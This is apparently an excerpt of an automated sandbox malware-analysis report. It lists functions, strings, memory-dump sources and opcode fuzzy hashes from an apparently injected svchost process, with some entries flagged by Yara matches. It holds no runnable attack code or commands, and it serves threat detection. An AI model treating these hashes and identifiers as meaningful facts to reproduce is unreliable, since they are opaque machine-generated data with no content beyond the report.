                                                                                                                  • Opcode ID: aee55ff02874af0fc01374a5fda4a24b9ba6d014d0833405732720e0de7ae7dc
                                                                                                                  • Instruction ID: a33894e1ba7e9c23f903982c4811032c8dd2345cf374c7cb96160e770f7ac5a4
                                                                                                                  • Opcode Fuzzy Hash: aee55ff02874af0fc01374a5fda4a24b9ba6d014d0833405732720e0de7ae7dc
                                                                                                                  • Instruction Fuzzy Hash: 0141D7336087609FCB29CE6AD440AA6B7F9AF49650F090569EC58EB353D731DD00CB91
                                                                                                                  Function 03C633A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • RtlCreateActivationContext, xrefs: 03CA29F9
                                                                                                                  • SXS: %s() passed the empty activation context data, xrefs: 03CA29FE
                                                                                                                  • Actx , xrefs: 03C633AC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                  • API String ID: 0-859632880
                                                                                                                  • Opcode ID: b222cf6569ccf797637e902cbce818ca3ea0850945c635bb8d61d1622a5989dc
                                                                                                                  • Instruction ID: 03b72a08c182bb5336ff860b89f319b9103e72624536141364251502803ffbfa
                                                                                                                  • Opcode Fuzzy Hash: b222cf6569ccf797637e902cbce818ca3ea0850945c635bb8d61d1622a5989dc
                                                                                                                  • Instruction Fuzzy Hash: 423144362003529FDB22DE58C8C4BAABBA4FB44714F098469EC05DF2A1CB30ED41CB90
                                                                                                                  Function 03C61607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • DLL "%wZ" has TLS information at %p, xrefs: 03CA1A40
                                                                                                                  • LdrpInitializeTls, xrefs: 03CA1A47
                                                                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 03CA1A51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                  • API String ID: 0-931879808
                                                                                                                  • Opcode ID: 232ef4bde9ae74312ec0c00bd7998a828dfcc860c3629a13d79c6743acf75cec
                                                                                                                  • Instruction ID: 8e18d4c532c18ac72847b7e34dc17a33451b7b2d9ac12bd43db9092cc4f8bb9a
                                                                                                                  • Opcode Fuzzy Hash: 232ef4bde9ae74312ec0c00bd7998a828dfcc860c3629a13d79c6743acf75cec
                                                                                                                  • Instruction Fuzzy Hash: 75310776A00200ABD720DB59D885F7AB7ADEB66759F0D0069F405EB280E770EE04A790
                                                                                                                  Function 03C71270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 03C7127B
                                                                                                                  • BuildLabEx, xrefs: 03C7130F
                                                                                                                  • @, xrefs: 03C712A5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                  • API String ID: 0-3051831665
                                                                                                                  • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                                  • Instruction ID: fe26cc9ad5032d75251f50edcf7d0ae56d1daffa60f2768b54bd8bc2efbd6819
                                                                                                                  • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                                  • Instruction Fuzzy Hash: 3531CD76900619AFCB11EFA5CC48EEEBBBDEB84714F054421ED14EB260DB30DA059BA0
                                                                                                                  Function 03CB20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • Process initialization failed with status 0x%08lx, xrefs: 03CB20F3
                                                                                                                  • LdrpInitializationFailure, xrefs: 03CB20FA
                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 03CB2104
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                  • API String ID: 0-2986994758
                                                                                                                  • Opcode ID: 9142230e8e5035fdb776e2b0f8f9e75cbc49eb9074c6a45e4d90a383e1932fb0
                                                                                                                  • Instruction ID: 5c0f2f6bc7b6f7ce4dad8e31f31dd53dd44d5ff83605bc2ee087e4196543a361
                                                                                                                  • Opcode Fuzzy Hash: 9142230e8e5035fdb776e2b0f8f9e75cbc49eb9074c6a45e4d90a383e1932fb0
                                                                                                                  • Instruction Fuzzy Hash: E8F0283A640308BFEB24E60CDC02FD97768EB41B04F050464FA00EF281D2F0AA10EA90
                                                                                                                  Function 03C403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ___swprintf_l
                                                                                                                  • String ID: #%u
                                                                                                                  • API String ID: 48624451-232158463
                                                                                                                  • Opcode ID: 95eecad1a41a9a1ebbb41433d499da2e898ac58b150ce1197c8b56c08c1a7ec1
                                                                                                                  • Instruction ID: 1456d5bfc5b60d24ea47eff171b325440adcc5cda252498e2d8795ea1696fea7
                                                                                                                  • Opcode Fuzzy Hash: 95eecad1a41a9a1ebbb41433d499da2e898ac58b150ce1197c8b56c08c1a7ec1
                                                                                                                  • Instruction Fuzzy Hash: 06715B76A002499FDB05DFA9D994BAEB7B8FF48304F164065E901EB251EB34EE01DB60
                                                                                                                  Function 03CD705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                  • String ID: kLsE
                                                                                                                  • API String ID: 3446177414-3058123920
                                                                                                                  • Opcode ID: e885cc6177feb6670a86f22e2459c7cb879a7008162c6773e95421973d44ab0e
                                                                                                                  • Instruction ID: c6828853ad4a863a26bf1e63059b071ed2fecf56155baf851f426090f482c5f6
                                                                                                                  • Opcode Fuzzy Hash: e885cc6177feb6670a86f22e2459c7cb879a7008162c6773e95421973d44ab0e
                                                                                                                  • Instruction Fuzzy Hash: 8A4187735013504AE731FF65E884B69BBA4AB30B24F190258FEA0CF2C9CBB09585D7A0
                                                                                                                  Function 03C452A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @$@
                                                                                                                  • API String ID: 0-149943524
                                                                                                                  • Opcode ID: 2d6d0801389f9bf6ba9d1fd230e915b8deede90f359de03dbd4ffc867d1c4450
                                                                                                                  • Instruction ID: f0d83d79cfc8e0eb2c83ab1de05bf49b89b4d2a5a44e631d345cf3cb4450851f
                                                                                                                  • Opcode Fuzzy Hash: 2d6d0801389f9bf6ba9d1fd230e915b8deede90f359de03dbd4ffc867d1c4450
                                                                                                                  • Instruction Fuzzy Hash: A932A8755083118BDB24CF19C484B7EF7E1AF8A750F19492EF986DB290E734CA94CB92
                                                                                                                  Function 03CFA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: `$`
                                                                                                                  • API String ID: 0-197956300
                                                                                                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                  • Instruction ID: f859c663c0bb734eb4a3c39f6d9b6671c0174392a7544de40434cd290343a0fd
                                                                                                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                  • Instruction Fuzzy Hash: D9C1DE352047429FDB64CF29C845B6BFBE5AF84318F084A2DFA99CA290D774D645CF81
                                                                                                                  Function 03C30CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • Failed to retrieve service checksum., xrefs: 03C8EE56
                                                                                                                  • ResIdCount less than 2., xrefs: 03C8EEC9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                                                                  • API String ID: 0-863616075
                                                                                                                  • Opcode ID: 35bf1ce05264805f17f0909b49087b0e955d176d0dfde634ee0cd99f6c6dc379
                                                                                                                  • Instruction ID: 177dd187b698b30c6446800f68f0309da3dd2a3a8374052c4b3070258f780ae6
                                                                                                                  • Opcode Fuzzy Hash: 35bf1ce05264805f17f0909b49087b0e955d176d0dfde634ee0cd99f6c6dc379
                                                                                                                  • Instruction Fuzzy Hash: 8EE1E2B59087849FE324CF15C440BABBBE4FB89315F448A2EE599CB380DB719609CF56
                                                                                                                  Function 00402630 Relevance: 2.8, Strings: 2, Instructions: 278COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: .$gfff
                                                                                                                  • API String ID: 0-3321379909
                                                                                                                  • Opcode ID: ae76919330f0a4130904a0671bf9270d44bac9c817bc9f5d968cf1d3273f2116
                                                                                                                  • Instruction ID: cc692bda95e33531589f041d7c0e08a2e0d49200a6b2c31996da16c26e5115e7
                                                                                                                  • Opcode Fuzzy Hash: ae76919330f0a4130904a0671bf9270d44bac9c817bc9f5d968cf1d3273f2116
                                                                                                                  • Instruction Fuzzy Hash: 1991D376B005098BDB1CCE1DCED46AA73A2EB94314F18817AE906DF3D1E679ED118784
                                                                                                                  Function 0040262D Relevance: 2.7, Strings: 2, Instructions: 247COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: .$gfff
                                                                                                                  • API String ID: 0-3321379909
                                                                                                                  • Opcode ID: 24f85e0da1d8e8b057bb207969d746825698a397febfdaf51788e199c9dc877d
                                                                                                                  • Instruction ID: 98ce2581d75e574c2925a7002c60b316e607e9a206a91bf1dc3f8e9b8159c86c
                                                                                                                  • Opcode Fuzzy Hash: 24f85e0da1d8e8b057bb207969d746825698a397febfdaf51788e199c9dc877d
                                                                                                                  • Instruction Fuzzy Hash: 9081B376B005098BDB1CCE1DCED56AA7262EB94304F58827AED05DF3D1E6B8AD118784
                                                                                                                  Function 03CAE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID: Legacy$UEFI
                                                                                                                  • API String ID: 2994545307-634100481
                                                                                                                  • Opcode ID: 3eef02902b89abdd4aa05481f1817978472cc411fb3d355d4c4e419edb8f570e
                                                                                                                  • Instruction ID: 2fb2911126f5376dd9212d302047102411fd69b9a09ad4bae3dc3301d33cd93d
                                                                                                                  • Opcode Fuzzy Hash: 3eef02902b89abdd4aa05481f1817978472cc411fb3d355d4c4e419edb8f570e
                                                                                                                  • Instruction Fuzzy Hash: BC614C72E00B199FDB24DFBDC880BADBBB9FB44704F144069E559EB291D731A940DB90
                                                                                                                  Function 03C4F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $$$
                                                                                                                  • API String ID: 0-233714265
                                                                                                                  • Opcode ID: 57f136ceaa6c47729ecb5341f8fd0cc98e8b59133d966ad06c975cb988da8c20
                                                                                                                  • Instruction ID: 6dc7c6dff11edded79869eb8bde08c034dfebceef0fe6be928d2d5b73bab5425
                                                                                                                  • Opcode Fuzzy Hash: 57f136ceaa6c47729ecb5341f8fd0cc98e8b59133d966ad06c975cb988da8c20
                                                                                                                  • Instruction Fuzzy Hash: ED61B736A0074ADFDB20EFA4C584BADB7B2BF48308F09406DD515EF680CB74AA41DB90
                                                                                                                  Function 03C3A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 03C3A309
                                                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 03C3A2FB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                  • API String ID: 0-2876891731
                                                                                                                  • Opcode ID: 88ba39bd85ad4c893c8c90f18b7e4ab0a4a50ca6274d3c5e148ef4ed7bbb3257
                                                                                                                  • Instruction ID: f6a0a4da448a6ff37b606432ae1ba803537d6f0524f44b2d67a2bb1cf0a2d55f
                                                                                                                  • Opcode Fuzzy Hash: 88ba39bd85ad4c893c8c90f18b7e4ab0a4a50ca6274d3c5e148ef4ed7bbb3257
                                                                                                                  • Instruction Fuzzy Hash: 4341CF78A04649DBDB11CF69C844B69B7F4FF86700F1944AAEC81DF2A1E735DA10CB41
                                                                                                                  Function 03C6329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: .Local\$@
                                                                                                                  • API String ID: 0-380025441
                                                                                                                  • Opcode ID: ba27445a242533f57c143f14d9b0947ba92cae202c1045376780b528b7cc99f8
                                                                                                                  • Instruction ID: d19451b5720a3534b69165f500853dc81849b9f0a5ebd4d7acffef7f66427152
                                                                                                                  • Opcode Fuzzy Hash: ba27445a242533f57c143f14d9b0947ba92cae202c1045376780b528b7cc99f8
                                                                                                                  • Instruction Fuzzy Hash: AD31B37A5083449FC310DF29C8C0A6BBBE8FBC5654F49092EF995C7260DA30DE05DB92
                                                                                                                  Function 03C3C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: MUI
                                                                                                                  • API String ID: 0-1339004836
                                                                                                                  • Opcode ID: f1c59133b1817cf9a0ab131decfb0dfea3b2faaa57a378348a6a973c3ed676e5
                                                                                                                  • Instruction ID: be00aaf97956b56916b1b5b7d97fe4a1571b43b83d24ab134b2731902e9abb81
                                                                                                                  • Opcode Fuzzy Hash: f1c59133b1817cf9a0ab131decfb0dfea3b2faaa57a378348a6a973c3ed676e5
                                                                                                                  • Instruction Fuzzy Hash: EF824C75E002189BDB24CFA9C984BEDF7B5BF4A710F188169D85AEB250DB319E41CF50
                                                                                                                  Function 03C82F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: P`owRbow
                                                                                                                  • API String ID: 0-263301770
                                                                                                                  • Opcode ID: f849b347fc7dff7d1b9845de0d28806afb470cea834059b6b02d841b2ef43be9
                                                                                                                  • Instruction ID: 43bfe3ab7374075d124a78a173bce885670fe94b4cc2f55229a1b80659a2f7b6
                                                                                                                  • Opcode Fuzzy Hash: f849b347fc7dff7d1b9845de0d28806afb470cea834059b6b02d841b2ef43be9
                                                                                                                  • Instruction Fuzzy Hash: 8542E27DD04299AADF29FFA8D8446BDFBB0AF04B18F18905AD441EF280D7358B81CB54
                                                                                                                  Function 03C37370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c8bca6361eead5c074511716da2787b4ceb36671cc67e447616df1921eac991a
                                                                                                                  • Instruction ID: 2d51b14a2c476683a68a3beda7dba8961bd2f3038d6c2c80109ac449adceef35
                                                                                                                  • Opcode Fuzzy Hash: c8bca6361eead5c074511716da2787b4ceb36671cc67e447616df1921eac991a
                                                                                                                  • Instruction Fuzzy Hash: D9A16BB5608342CFD724DF29C480A2ABBE5BF89704F19496EE585DB350E730E945CF92
                                                                                                                  Function 03C52E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 0-4108050209
                                                                                                                  • Opcode ID: 72a7eaf7cc8e56cc8ed2abe6e1ee436b0abd1d9a8e75c0bcbb22e99e38ff597e
                                                                                                                  • Instruction ID: 85e08dfcb1a0fc284eb2cb806008690ce3c7f91c9dddbf95a7eb22085ec416ea
                                                                                                                  • Opcode Fuzzy Hash: 72a7eaf7cc8e56cc8ed2abe6e1ee436b0abd1d9a8e75c0bcbb22e99e38ff597e
                                                                                                                  • Instruction Fuzzy Hash: F1F1B0796087819FDB25CF25C484B6BBBE5AFC8750F09486DFC89CB240CB34DA858B55
                                                                                                                  Function 00416953 Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: (
                                                                                                                  • API String ID: 0-3887548279
                                                                                                                  • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                  • Instruction ID: 3fe818a56d1c4c4c1cd7bbfb03c2513051827dc6881f052d851438b6f9677059
                                                                                                                  • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                  • Instruction Fuzzy Hash: A6021EB6E006189FDB14CF9AC4805DDFBF2FF88314F1AC1AAD859A7315D674AA418F80
                                                                                                                  Function 03C32FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: PATH
                                                                                                                  • API String ID: 0-1036084923
                                                                                                                  • Opcode ID: 782b45dc364bbbac17c1424fe324914e2c8a6010b78bbe36d1c4c3525d564296
                                                                                                                  • Instruction ID: f63a8d3011b777662e3d77c456c32564c3cfe19375716406d70bf68f99a1593e
                                                                                                                  • Opcode Fuzzy Hash: 782b45dc364bbbac17c1424fe324914e2c8a6010b78bbe36d1c4c3525d564296
                                                                                                                  • Instruction Fuzzy Hash: F6F1D37AD00258DBCB25DFA9D880ABEBBB1FF9A700F494029E841EB350D775E941CB51
                                                                                                                  Function 03C6F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0db82049e943eed8f3afb27185a05683fe4bad9db05d5e5358d63aed22a0c05e
                                                                                                                  • Instruction ID: 9e5445505445a6e9497ff835554e335669c171fff8a67fe58c9d5e37b1dc8e54
                                                                                                                  • Opcode Fuzzy Hash: 0db82049e943eed8f3afb27185a05683fe4bad9db05d5e5358d63aed22a0c05e
                                                                                                                  • Instruction Fuzzy Hash: 6D4149B5D00288AFDB20DFA9D880AADFBF4FB58300F14416EE859EB211D7319A01DF60
                                                                                                                  Function 03C30100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 0-3916222277
                                                                                                                  • Opcode ID: fbaf9936e9123821a492d56ca45ed1a1daace3bde71f0748d9804f1b1800625c
                                                                                                                  • Instruction ID: 912b5104630a4608ee12ec42806349a05d3a2cf8080956f54a22822f56e8015b
                                                                                                                  • Opcode Fuzzy Hash: fbaf9936e9123821a492d56ca45ed1a1daace3bde71f0748d9804f1b1800625c
                                                                                                                  • Instruction Fuzzy Hash: 61A10B33A043786BDF64DB298840BFEA7A95F46308F0940D9ED87EF281CA759B44CB55
                                                                                                                  Function 03C6A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: GlobalTags
                                                                                                                  • API String ID: 0-1106856819
                                                                                                                  • Opcode ID: 4f3e426a6e092e9f6209aa5eb0ce3fc0d2c0af962f2ec626ba6c3c08e6782a70
                                                                                                                  • Instruction ID: 89f174274dab451a1fc6c813c47b92bd799d84f0eb91e9922cf15142aeef4ff4
                                                                                                                  • Opcode Fuzzy Hash: 4f3e426a6e092e9f6209aa5eb0ce3fc0d2c0af962f2ec626ba6c3c08e6782a70
                                                                                                                  • Instruction Fuzzy Hash: 0C716D76E0071ADFDF28CF9DD5906ADBBB5BF48708F18816AE806EB240E7309951CB54
                                                                                                                  Function 03C3973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 0-2766056989
                                                                                                                  • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                                  • Instruction ID: f49e858e14be0f8fd7364af565b33b151c54cc059969ad305024a28233406e22
                                                                                                                  • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                                  • Instruction Fuzzy Hash: 90618D76D00219ABDF21DF99C844BEEFBB8FF81710F16456AE810EB290D7709A01DB91
                                                                                                                  Function 03CBF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                                  Download Yara Rule
